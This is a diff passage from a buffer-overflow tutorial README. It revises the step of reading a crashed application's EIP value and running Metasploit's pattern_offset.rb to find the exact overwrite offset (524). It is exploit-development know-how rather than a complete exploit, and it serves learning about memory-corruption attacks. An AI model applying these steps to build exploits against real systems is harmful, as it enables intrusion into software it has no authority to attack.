gh0x0st/Buffer_Overflow/README.md

 	s.close()
 ```

 Send that payload to the application, make sure it crashed and grab the EIP value in the debugger.
 For this application, it will be 35724134.
 We will now use a second script from Metasploit called pattern_offset.rb.
-We'll use the value from EIP against this script to determine the exact offset which will be the exact number of bytes needed to fill the buffer.
+What this script will do is take that value and seeing exactly where it exists in the buffer length we designate, showing us the point where the buffer will crash.

 ```
-root@gh0x0st:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134
+root@gh0x0st:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134 -l 600
 [*] Exact match at offset 524
 ```